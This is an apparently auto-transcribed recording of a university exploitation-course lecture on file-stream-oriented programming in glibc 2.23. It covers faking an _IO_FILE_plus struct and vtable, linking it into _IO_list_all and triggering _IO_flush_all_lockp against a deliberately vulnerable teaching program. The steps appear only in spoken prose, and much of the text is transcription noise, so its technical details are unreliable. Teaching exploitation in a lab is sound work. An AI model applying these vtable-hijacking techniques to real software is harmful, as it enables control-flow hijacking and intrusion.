Cloud, Okey-dokey. So we just have some chat since we're on Zoom today purely just to say, hey, where is everybody at? Where do we start? So I'm hoping that today ties together the last two lectures, worse and in Haiti last two lectures. A little bit weird. I think I was just and and, and it's right in the middle of what I hadn't 533. Just kind of continuing. So this is here for reminder. By the way, I'll show you that later. Note to self, Note to Self demo. The underscore I0 is everywhere. So what are we talking about here? We're talking about files, structs, file streams, which is standard error, standard out, standard in and any things that I might open with the kernel. And these things have a V table. And so the three structs that matter are this like file struct, where this offset will lead me to the IO read pointer. This offset will lead the endpoint or et cetera. Chain is how they make the LinkedList. So probably people latched on to like, oh, I can see the LinkedList now where there is a global called IO list, all that global points at the first file struct, here is one of them. This is me D printing the de-reference. If I list all, it is not just an IO file, but an IO file plus, which is just a silly wrapper that has the file struct and a vtable pointer. The structure of the V table is actually a jump table, fine. And so that's called IO file jumps. And these are all the values in this particular struct. And this one is standard error and it changed in the standard out. And here's my sort of demo of that. It's IO list all pointing at. Well, it's a pointer, It's when i o file bus that is currently pointing at IHC. One standard error. That file plus goes to a file has an underscore chain which is a pointer to an IO file, which points at the struct first standard out. Now I don't need a dot file, but this isn't a plus, although it is but the pointers to a file. So dot chain will give me a standard in that chain will give me null. So this is the LinkedList. This will always be there. From Iowa stall is the location of the head as a singly LinkedList to standard error, standard out standard and MP. V table will point me to a, a table full of function pointers. And here is the dereference of that address. Observe these function pointers, take a look. The file stream might need to finish whatever overflow is, whatever underflow is wherever P back fail is. Seek off, seat position set buff, do allocate the right seat. Closed stats show many imbue. Okay. Each of these is, is an address to a function that it will use when it's time to do whatever that is, finish this thing. Okey-dokey. So my goal today is to actually really do this stuff. Hack with a demo at that kind of thing. And I'm going to gloss over these possible objectives. But just to say, why am I teaching you this? Why does this matter? One, It's a good example of us doing security research to it is a target that is still viable. And 2, 3, 4, 3, it's one of our better candidates. After the loss of malloc hook frequently. Our process is to go backwards to point to three, when this thing was at its strongest and see what vulnerability has been existed and see if we can find a way around into place people. So possible objectives. The table hijacking. Okay? Then we will use some words to describe what vtable hijacking might mean. Knowing nothing else, never having to use determine your life before or whatever. How would VE table hijacking help us accomplish our goals? Whatever it might mean? What's, what held in the B table. Su, interest in AI. We're going back 14, that's just the table. Hijacking is pretty much like removing sensitive V table, and it's just pointing to an arbitrary address. Placing the address was like a one gadget or something. Yeah, that's right. It's a lot like GOT overwriting. Well, so when we're doing print Fs and we were able to write over function addresses. If I can control that, then I can trigger one of these actions. I'm doing what I thought it was going to do. It's going to be what I told it to. So this is a good way to control an instruction pointer. So in general, if there's a beautiful Now, does anybody know why be tables exist at all in code? Because that way you don't have to have every files for having a pointer to all of those functions. You just have them point to the same table functions to reduce your waste so much memory that way. Okay, that's the thoughts. I actually think it's the opposite. Oh, wow. Okay. Okay. It's both. Yes. So then I've got less memory per file struct because they do share them. Do share this B table. It the answer I was fishing for it. My mind is that it allows me to have custom functionality for particular instances of a class. So for anything that's object-oriented coding, you need the ability to overwrite your version of the function. So I don't know when I was learning objects where encoding, like ducks, see I'd like a duck class or an animal class. And the duck is an instance of the Animal class or a subclass that the animal passed. And then I can make a particular duck. And each one can have a different make sound function. Or a generic animal might have sort of, it's going to have a make sound, but it doesn't have a particular default make sound function. But each subclass will make it, they'll make sound function. So duck will make Quack and dog will make a wolf. And then a particular duck might have learned English or something and it, you know, Jaffe will tell a joke or whatever. So the V table is how we implement this kind of hierarchical object-oriented coding. I think you're right also, that it does save space if I've got things that share of the table. But if I'm going to start overwriting them, then I need to have the ability to make my own BY table for that particular phone. Right? That resonate with anybody. You guys have all had object-oriented classes in the past and so on. I'm staring at the black boxes like, like, it's kind of like the, the image is not simple. So anyway, so that's an overriding bunch of poles. Cool, Thanks. So next possible target. So one possible target is overhead and the B table love that concept. And we're going to look for it where we're being security research. Next target, arbitrary reading. Alright. This is a file stream. File streams are how I display stuff on the screen. I can read from standard out or read to standard out. I can read from standard in. Well, if you look at the names of some of these pointers, take a look at some of these pointers. Io read pointer, IO read, and IO read base. If I can overwrite those 3 pointers and trigger some sort of a flush of this buffer. It's almost certainly going to show me all of the texts from pointer to n. Which means that if I can put them at arbitrary addresses, I can week all sorts of stuff. All right, so one of the possible targets that I might be interested in looking at in playing with this playground is, can I read anything in the world that I want this? And the answer is yes. There are some hoops to jump through, but yes. How about arbitrary writing? Well, same deal. This is standard in there is a right base and a right pointer and a right and an a buffer base in the buffer. And probably some combination of addresses here will allow me to dump from some set of addresses to another set of addresses. Okay? But to figure out the mechanics of that and things like that, and that's, that's part of farting around in this space. Okay. One thing I will say so today my lecture topic is like the old ancient 2.23. F SOP kind of exploits. Well, this is the f-stop exploit that we're going to use in 2.23. It is a weird little thing. Io flush, all Lock key, right? You wouldn't know about it naturally. And, and kind of as we do our research, we're looking for some sort of equivalent of this in the modern era. What this is going to do is it's going to go through that linked list and it's going to flush all of the buffers. This is something that happens when a program is going to abort. Oh, there's a diagram. I thought I'd grab the diagram. I didn't I I bet I put the diagram in its own tab. There's this diagram that I want to show you here. This is the dude that invented F sub, giving a talk slides for that or whatever. Policies to go through. Them. All as the same social. We'll move on phones. I pulled it out. All the firewalls. I don't have the picture that I want it here. I'll move these stones. Find some form to it. I'm just going to do a Google search. Yes. Flush all, lock the pawn in. That's the image on thank you. Google stuff. Okay. Here we go. This picture here which should totally be embedded in my notes. Forgive me for taking a secondary. This is what makes two points, 2, 3 vulnerable to us. And it is the following weird notion of how file strings work by mg. Let's see here. When there is an error, a memory corruption or something like that. It goes through this chain. Malloc, print error. What's the error? Message? Boards. Then flush all the buffers. And flush all the buffers will call the V table for overflow on each of the file streams if they satisfy a condition. Okay, so this is what we're gonna do in the House of Orange. That's the target this week is going to set this all up. We're going to use nothing but like malloc to trigger all this stuff. Overwrite a fake v table pointing at it, change overflow, overwrite a fake file stream. Pretty complex stuff. It's pretty complex one for us, but if you can do it, you're like, okay at night. This is why it works. There's a really cool exploit because you will get your error message, you'll collapse the program and after that, get your shell. That's kinda cool. You like here's all your error messages, your end, the file warning or whatever. And then here's your shell is like oh, the bat. Which is justifying because every time I get that end to file, I always type LS Anyway. It's the only time that it actually works. I'll review. Now. This is all academic to you. It's all words. We need to see it in action and do the thing. So here's how I'm going to have you do it in action. And thank you too. Luke IS and aids were for helping me walk through this and improve it. So this is my second iteration. I've been proved this since Monday. So here in our notes is the f-stop playground. This is where it goes from academic to really feeling it. And for those of you who are in that camp was like, okay, I will get this when I started to do it. I'm going to show you how to do this kind of from scratch. Here's our playground. Let's go to demos and I'll actually make banded Directory, Class 34. Make door. Oh boy. Okey-dokey. Gcc. F's up that soon. All right, cool. All right, so this is a variation on the theme of our key playground. By the way, I'm not removing the other exploits in the heap playgrounds. If you've exploited he playground and the pass, all those exploits still exists here. I'm adding more vulnerabilities, but, but, you know, it's just up to you to be like, Okay, now I'm going to exploit it this way and I'm going to explain it this way. Different constraint. I'm going to give us a window function, too simple to really concentrate on. Just the thing I want to concentrate on today, which is V table hijacking. And these are the two new functions that I added for you. Link a chunk into the ILO list, all singly linked list and see, uh, chunks address, right? Getting a Chunks address is not hard with other elites. This is just a lazy thing that I added. And this one is going to add a one of our chunks as if it were a file struct in the LinkedList. I'm going to link it in after standard errors instead of standard error, the standard out and standard error to some chunk we provided then to standard out. Okay, So let's fight around with that. One. We are working in G lib C to point to three for now. So I'm going to copy L star here. Yep, that's fine. And I'm going to copy it to other things in there. So I like, as a researcher, I want to see what error message isn't getting. If I get an error message and copying malloc dot c. And then the other one would be in the source code is in a lib i 0 Gen Ops dot soon. So by adding these two in here and then linking to a dot out in our way. Now if I run GDB a dot out, that run control C will map. I can see that my lib C is this one which is mixing point to free. My linker is here. And if when I get to errors, I have the actual source code of where the error is triggering inside File Stream and inside of malloc with a medical problem. So there's maybe one of the file I probably should put in there, and that's lib EOP dot h, which I included enter in our notes, but not to you. Okay? So here is the goal. I have a working one of these, but I'm going to try to do it from scratch with you in the next 20 minutes. So here's what we're gonna do. We're gonna make a fake table, right? That is to say we're going to make a struct that looks just like this. And we're going to fill, so I'm just going to fill every one of these function pointers with the wind address. All right, then I'm going to make a fake file stream. That as I'm going to make a chunk. And I'm going to declare that chunk as a file stream of an IO file. Struct. The IO file plus structs will look like this. Where I just have these values in here that didn't, didn't, didn't. And then a vtable pointer at the end. This one will point to my other chunk. Okay, so I'm going to fill this up with fake data. We're going to link it into R and then put the address my fake B table at the very end, that's 216 bytes. We can do more of that offset stuff. And our job is to make the overflow function pointer, the when function, and then triggered the end of the function and see what goes wrong and flush all luckily, there's a bug that we're going to find that a sanity check that they do that we're gonna have to get around by kind of making the struct a little bit smarter. So I want to show you that and how would you get around it? And then we're ready to do our first file stream oriented thing and kind of see what's happening. Okay, So here we go. I have a starter exploit. This just reads the week and adds the new things. Leak and link as Python you're telling me soon. So here's my sort of started with, oh, one other thing I wanted to show you. I think this might be worth the price of admission. Again, my job is just to try to fill you up with as much goodness as possible and comfort you that doesn't have any negative impact on the bird's. My job is to just tell you stuff that's useful. Well, take a look at this process here. This I picked up from another poner. And I think it's beautiful as a security researcher. And that's kind of our theme right now. It's like, okay, how do I, how do I go about finding new ones for the world? Take a look at this. This is a string. Then I'm going to put into my exploit script that's going to run a GDB set of commands at the beginning of my program. And this one is setting a pending breakpoint. So here's a symbol that's an ABA random address. And I can put this breakpoint in advance because I'm looking to see, hey, I want to trigger the IO flush all lock the function. I don't know what the address will be, but I'm going to enable these breakpoints once it's sort of running and then hit Continue. So this sort of pending breakpoint set a breakpoint, continue. I don't know what the number 1 means that the investment because I I grabbed it from somebody else, so I don't know if I add more of these are there to there something like that. I don't know what that one means. I'll figure that out. But this little snippet I think is beautiful because If I'm exploring the entirety of g, Let's see, and I'm hunting for some other version of something like this, the next oriented programming or whatever. And, and to make that discovery and then patch it. I want to see, Here's a vision for you. Imagine all these vtable pointer is why I'd like to see when any of them are triggered. And in fact, I'll show you one other cool thing where if I run GDB, a dot out that just like hit run, and I just hit Control-C. Take a look at that stack frame, right? Or this backtrace. Anytime I'm in here, there's a set of functions that is run in the past that have got me to where I'm at. Well, main data scan f and scan f. They called IO vf Stana IO default, new flow. Gi IO file underflow, read NO cancel what? These, these are functions in the B table, right? Like this is literally what the B table is pointing at. So this whole time, every time we've hit Control-C and GDB, and we look at that backtrace. It's going through this set of B tables and teaching about now. So just to say, always been with you, you just didn't know about. And I'll do another like this, like this, like I twist at the end of the movie. You're like, Oh my gosh, it was here the whole time. We can go all the way back to like our first lectures and stuff, right? In our first lecture is we're looking at the symbols and a dot out. Well, look at, look at that. What's the second symbol on the list? I'll list all up. All of a sudden we care about the symbol, but we didn't know. And we've learned PLT and we've learned that GOT and we've learned that data segments and things like that or whatever. I'm pretty sure there's a couple other IOs symbols in here. There we go. Ios standard and used. Okay. I o list all at a slightly different location. All right, that's interesting. And any important guys? Okay, so just to say this LinkedLists was always here right under our noses, we simulate it meant that today that's the nature of it. Okay. So this is a, this stuff that we're touching. It seems esoteric to us, but it's just a different place. And it's, you know, how anything reads and writes anything in the standard IO library, including standard io dot h and every C program you've ever written. And that's the stuff that were happening. Oh, okay. I've got the Xmax on for now. I'll leave it on. All right, so what was my goal? I want to make a fake table. So I'm just gonna kinda right my goals and goal one. Make a chunk that they take the table hold to get the address of that chunk. All three make a chunk with a fake or ill struggles for linked with fake IO file struct to fake the table. Goal five links. We fake file, struct the list at all. Okay? Six, this is the two points you'd be part. Trigger the underflow function or overflow function. Say, hey, any questions before we dive in? Like I don't feel as academics still or whatever, but I'm going to go step-by-step through these things is sort of do them and reselect them and see how that goes. All right, how do I make a fake table? Well, I need malloc. How big should it be? Well, let's take a look at the struct. Here is a table. It's an IO jump to. These are my offsets. Write a 0 is the last offset. So if I asked size 8, that should be enough bytes to get the whole table into a chunk. So I'm going to say OX, a guy's cool event. Now. I'm going to need to fill it up with some addresses. I have a window function. I've lead to win function so I can put in my when address. And the question is, how many times do I do that? When one to two per 16 bytes, 2, 4, 6, 8, 10, 12, 14, 16 to 20 one. So I need 21 function pointers in here. Everything's it offsets of eight. So I'm just gonna make every single one of these values the same function pointer. So I'm just going put 20. Want to use any of them, any questions on what I've made, I'd add asks for an address in memory. I filled it with function pointers to the wind atlas, right? Make 21 of them and then re, okay with that. Structs. They're not magic. It's just data. Now, I need to get the address of that chunk, right? This thing produces a week from a particular index. So week is my utility that will give me the address of that chunk. So I'll say the table Address equals leap 0. Alright, now we're going to make a file struct. Let's do the same process. How long is my file struct? A little bit interesting. It's not quite as clean. I've got some, some fours in Year 2's in here, flow annoying. And at the end I've got cart onesies starting at C or since 20 is, is this plus like 14 in hexadecimal. So D eight hex the eight is how long any of this. And now this is the file struct. I also need to add a pointer at the end of that. So I needed to be E0, the eight plus eight. You guys okay with the math I'm doing there. So this is where the last thing is. Actually, let's just do the math and Python. I'll just leave this right? Where am I going to Python? Oh, oh, see for or is 196. And then it was 20 bytes. That's how long that thing, and that's 216. That's a sudden the thing. And then I need another eight bytes for the B table pointer. So 224 bytes total. Ipo. Have any idea what I'm doing there? I don't know if this is super obtuse or super obvious. Or just write me a little thumbs up, bipartisan, or thumbs down or a question. So I'm making a fake structs and we're going to replace all these values, whatever we want. And the size of it is S4. The last thing is 20 bytes, then we're having eight bytes. The end of that, because it's actually this kind of file plus business. That's right, but maybe it's a barrel. It's these extra eight bytes. After that. I got, I say repeats name team files. Okay, IO, ports to twinkle. All right, 224 bytes. Now this one we're going to have to come back to. So at the moment, I know one thing. I need 216 bytes and then 64 of my table. Now, these 216 bytes like this is not a good enough fake file struct, but this is what I know so far. So there's junk in there. I don't know what that means yet as a as a baby researcher. But I do want it to point to the right the table address. Okay. And now, Okay, So that was goal for, so I kind of did this at once. Their goal five is to link this into the IO file struct. Well that's the other thing that my playground bottles, so I playgrounds in some of the heavy lifting for you. Just to kind of show that it works. So we're going to link index 1 in the defect. That's what the multiples. So, so I'm going to pause here, We're going to week 5. And we're just going to run this thing and inspect and see what on Earth we've done and went out and made sense to us and things like that. I'm losing students left and right. They are not spot on in the left. Figure out later. Find there's a weighting function. Here's the chunk leak, just points out the address. And here is the linker, which is going to go into File IO list, all chain it to our guy and put our guy individual. Alright. Alright, let's run it and see how those teammates I pythons be minus I, x step 1, 10, list index out of range. All right. So not pending here. Control D. D. I think that might be a flaw in my exploits scripts. So if I made an adjustment somewhere, leads addresses. And so they didn't want extra went to 0 00 00, 00, 00 or downloadable moments. Schools choice could come. So we've got a bug somewhere, my exploit scripts. Let's figure it out. It is inside of this thing. What I'm going to turn off the TMax VIX dot p-y. Tg. Grants print off that too much part of this. And honestly, I might even just debug this display. Where was it complaining, complaining, complaining here. So let's comment this out and see if it complains up to that. And as complaining and my league function, yeah, for sure is playing loop function. So so instead of the week, let's just kind of friends. Everything's here. Let's print this malloc. I set my Python 3 minus I y. Okay? So you're using this, how big first payload. Here's the when function based on function. We're cool, we've got malloc. Let's do a 0. Yeah. It has totally malloc twice there. Okay. Totally malloc twice. Twice. I don't think I did I didn't make the second thing. I commented that out. Well, there's, there's just like a little flaw in my menu here. Now if I go to week 0, that came out okay, qx of that. Okay, so I've just got a little bit of a logic bomb in my malloc, which is probably just a slight adjustment to the way that I'm reading something. And you feel like, hey, I fix that in my own world. But not here. So it's literally just run a dot out. Mu 0.4. Sorry. 00. 00, 00. Is it This is it. I'm like reading the week in a dumb way. Well, okay. I'm not going to sweat it too much. Maybe. Let's do print mu 0. All right, Well, I think that should fix it up. Let's find out a what I call, I call that my table adverse. Xx 0, 0, 0, 0. Okay, yeah, there's definitely something wrong with my MATLAB code in the script. It's like missing one part of the yeah, like it's like off-by-one and what it's receiving. Not sure why. I don't know that I have to care because that was close enough to work and that I can teach you and feed you and I'm out of time. I'm definitely remember fixing something, my own homebrew version, but I want to build it from scratch. And so that's my flaw here answering, okay, we're going to do this inside of TMax, IPython 3 minus I sub p y, and spell pipeline correctly. Okay? All right. Here's what I wanted to show you. We want to see what have we done. So instead is I'm going to give this its own sort of worlds here. This is our fake file struct a, all the way up until this guy, which is pointing at f of 10, f 0, 1, 0, 0. Instead of TMax, I have a hard time scrolling back. I can probably get dQ at that address. Here we go. This is the when function over and over and over again. All the way up until the end of the fake meat table. Let's take a look at it this way. Key I will list all files chain that should points in my guy. The fact that it's not pointing to my guy means that our length, that didn't happen or maybe I didn't do the length. And my exploit scripts is that is all the things that aren't me. Okay? Some past-time, it's a limit of four. I think I want to add something. It's often the world here. And I'm as a public speaker getting a little bit nervous. Oh, it's the same crap. It's the same crap. I've got like something weird in my mailbox where they are kind of off by one and something sort of table address. Totally correct. Now let's try that again. Most of the time when it comes to this stuff, the issues are not your mental model. It's your debugging, debugging tools that shows you the exchange between them. That's why the debug argument. All right. I'll see you. Where do I put that in? So someone that has a command line argument to the script, you don't have to add an extra code. Should just work. Oh, so if I put debug at here, IPython 3 minus high X dot p-y debug like that. That should work. Yeah, I don't really yeah. Alright. Now I'm going to turn up the TMax because I can't scroll back in time and I've got my two months on. What this will amount to by the way, is. Because I can show you that in my like prepped for the lecture. Here is a working exploit of this type. There was a working exploitive this type. 00, 00, 00, 00, 00, 00, 00. Got playground. Here is our transporter that that was me. Before. That's the issue. I see. Okay. There's my working exploit. So say I did, I did my homework, but I wanted to do it from scratch. But I think I must have fixed one little thing in here. Either in the f-stop or in some line here. Now that you guys are not. So looking at a small level, 7, 11, the changing US compare on a CMP. Cmp or line 120 one. Yeah. It's somewhere right around here. Banner, when one said they were different, that line 120, one. Who leads from this function? Well, Bob's TIF, oh, sorry, I should do def, def EPS up that C and 34 C. Okay, those look the same. You will find if x dot PY for step 1, dot out, dot out, That's fine, that's fine. I'll be darned. Don't see see with defense. But basically every time I'm doing a malloc, it's doing two milliwatts. Because this little demo. So you gotta run off your next class again, my office hours now some snips upon fixing whatever the number thing is and I'll, I'll make it right. Public speaker wise, on Friday, word is worth the price of admission zones pool, invalid literal for int with based on out, I had to turn off. So 0, 0, 0, 0, 0, 0. So we received F sub playground when function at. We read that correctly, or home. We received the next bytes. We sent the byte one, received which index we sent the byte 0. 0. The see how big you send 206 seats silently. First, polo. Yeah. Send it to the bytes for it will pull. Oh, okay, this is what we got. Then. Then I did view 0. Welcome to the code. And look at that. Oh, see now it thinks it's in the middle, like a nine. How long is it? How long is a nine? So that's the end. And when we sent the four, see, it's already asking which index here. So somehow at the end of the malloc, it is going into the next menu request to quickly. So now it, now it thinks I'm mowing into index four. It thinks that my, How big is 0. And now it's going to put this like how big first payload. So i've, I've written something into. So somehow and the way that I'm like receiving until probably my receive and so it's a little bit off for the new thing. So maybe what I'll do is, is kind of looks like copy the exploits into like clean line. Okay. Oh, oh, I noted as I know what the lines will be. I've got all these send line after that angle brackets. I've got these line after angled brackets. And I think when I added the leak where the trunk or something like that, I included an angle bracket that I really shouldn't have. So like I think that that angle brackets here good. Let's honor that. But these angle brackets wherever they are, they need to be like That's what I'm receiving until. And here on this chunk leak, there, That's chunks address is this. That I think probably shouldn't be an angle bracket. Like that's the that's the button. Maybe. Let's go back and fix that. Like I'm reading until an angle bracket. And so this was going too far. Unless debuggers are spherical. I believe I didn't have that before proceeding until just the right angle bracket space is just until the angle bracket, that would be the trailing space. Yeah. Yeah, This says this thing seems to have an angle bracket here after first payload and there, base there. So this isn't two chunks that must be received until ans. When I went view 0. This is the receive until angle bracket. Receive until angle bracket, it's, this should be a 0 it's sending and it's sending a four there. So there's, there's an extra angle bracket. That's an extra angle bracket 0. So your question was in my received until somebody including a space, not including a phase line after yeah, we want to add as well the shot. I said this, I I did the word address somewhere in there, but I think this is. The view is a little bit funky that way was another addresses. All. So we're definitely like the debugger. My first payload sentence of that, like that all looks correct HTML to receive until space, that seems to be working fine. Now I go 0. So this is the receive until here. But it's not stopping at bat receive. And so stopping after that. Which means that in this payload 00, 00, 00, 00. Okay. This is cylinder. I think I just need to make this a little bit bigger. 0, 0. It's actually just the size of my thing. That is correct. Okay. Yes. Yes. Yes. I I know. I don't think it's got anything to do with the other stuff. I think that's all a false thing. But how big is 21 times 868. And I want extra space of the backlog. A 172, something like that. What is B? This is a yeah, I think I think that was the difference is that somehow I was feeding at more data. Then I asked for my math was just wrong and the size of my chunk, that's my flaw. So it was continuing on with stuff that I didn't address. So let's try it. But that's about it. Just think I want to go back down. Now. I'll list all file 1 second. Alright. Lincoln Chung. Oh, it's leaking chunk five and 10. We chunk to find my thing or a flaw in my world. Oh yeah, that's dumb. That's not the chunk on a weekend. Chicken link. In this chart you see stall standard error is. So, so I also have a memory of something like this. Where the V table pointer, it's like trying to look at was this slightly different offsets. Let's like kind of validate pulse-width a P star, IO stall. Actually, let's just go key iOS stall. This is the address of the standard error go. Let's take note of that. There's the samples. And now let's go PIO, list all that beat. Say, well, here's the address of the table. Okay. I want to have this minus times. I have a working version 2. I guess. Those are much further away than I want. I need an address. Why do you shall see our conversion? Let's file. So if I just show you this, so basically these folks are all the same. So they did the same greater than space than I showed you. Now. And I changed your view function a little bit here. Okay? Yeah. I wrap this in the wild, true because sometimes the heap address has an nobody in it. So if the dividend detects that, it just tries again. And then here we've got, you can have a GDP argument, right, with GDB. Okay, So this is all seen, this you gave me, and then we're just going to leak here with Athens and then, uh, use after free. Okay, so then what we do is first, I make a fake table with a little class. I rode into another file that I can show you in a minute that just sets the overflow function to win address. Well, that's a nice, that's a nice, That's a nice script. Actually that in a sec. Sure. It wasn't. Like I suggested, that the fake final struct with the right PTR equals one is that has to be greater than the right base mode equals minus 1. Now, yeah, and then it sits the B table. Made 300, 300. See, I think I was being a little too close to the vest on where on how much room I gave MTD. Cuz that's tau is my malloc thing was I was like asked for too little. And so but there's no harm and may just ask them to weigh more. So the file struct is 224. Like to think, I don't remember how big the table is. Yeah, yeah. I want to say it should be a 176 bytes or something like that. But now I like your strategy of just 300. Can you show me the, the weird F structs the abstract. So this is the table class. This is just the list of all of the function fields. And then the constructor, it just, it takes this keyword args, and if it's there, it sets it to what you provide an otherwise it sets it to 0. And it got a little empty. It's got an endianness argument to share. And then here it just does the inverse essentially with the D2 Blake's. Alright, and then for your file struct, you've got how big each thing is since there's yeah. Because some of these aren't pointers, so I had to store that. Yeah. Yeah. That's pretty much the same. Okay. Well, that is beautiful. I don't know that it helps me debug. My thing is I had a working version two, that sort of more manual. Totally sure what's going on in the course. Exactly. Exactly. So yes, I know it's all in there. It's been like that. And and to some extent, like from a teaching perspective, I knew that I had a working exploit, but I wanted to build it from scratch. I forgotten whatever wacky things I did to take it from like painful. It's a working like I didn't just wanna be like, Oh, here it works. And that's like two seconds of lecture time. I wonder to go through the process of it. And then that guy. Off somewhere just from a sizable thing. So I'll just spend some time debugging it and making amends, fighting one. But that's awesome. Shared that abstract thing. That's, that's a really cool super tool or whatever. Yeah. Obviously it's 64 bit only right now. Sure. Sure, sure. Yeah. So yeah, I'm fine living in 64 bit or 32 bit Landsberg academic toy comes or the embedded stuff. Okay, Well, maybe, maybe I'll stop the recording, but I'm still just sit here and work on mine or whatever. You can take off and go have lunch or whatever, but I'll not go anywhere as office hours time anyways, so I'll stop the recording. Or maybe I want something. Maybe I'll just record the debugging process. So yeah, it'll give you my script and I'm going to hit. Thanks. Okey-dokey. So see, I think bots, couple of errors. One, I like the idea of just making this bigger. I don't really care to 100 is fine level. And here I made it exactly 220 for a baby should really just to make it bigger. Link five is wrong. Don't want to link one home. And none of the file struct stuff is fine. I just wanted to lecture to work up to this point where we're on back into X. Is just the size nonstop. All right. The stall. Yes. There's the win. Yep. I just make my chunks bigger. And that cost me off now and that's kind of how the heat goes on. And I will continue. And we're back into spendable. Okey-dokey. What happens if we make baby? Isn't it? No real difference. It's at it just has more space at the end. So if I go down to the bottom and make this bigger as a struct, it's still just going to use what it needs. So I think I was just passing more data than it needed. So this should have been two hundred and twenty four hundred Supreme Court should've been fine, but I'm really reading 225 bytes. So it's adding a null byte at the end of the null by a gas was causing it to jump into malloc again or tripping up the menu. So that was the flaw. I don't think there's anything wrong with the scripts per se like that. Just I didn't malloc enough room. I'll report that in this word and that's enough football, so pond okay. Yeah. Issue was solved in just a few seconds. It was this. I wrote 224 bytes, big chunk and milliwatts. Four bytes. Last extra new line. Triggered background. I just ask for more space. We'll set cool. I guess.

FSOP struggles

From Andrew Novocin May 04, 2022

12 plays 0 comments You unliked the media.

Using our custom FSOP playground to link a fake _IO_FILE_plus struct into _IO_list_all

Tags: pwnfsop

Department Name: ECE
Department Division: Engineering
Date Established: May 04, 2022
Appears In: Sec Soft 2022 (x86 Exploitation)

Comments

Add a comment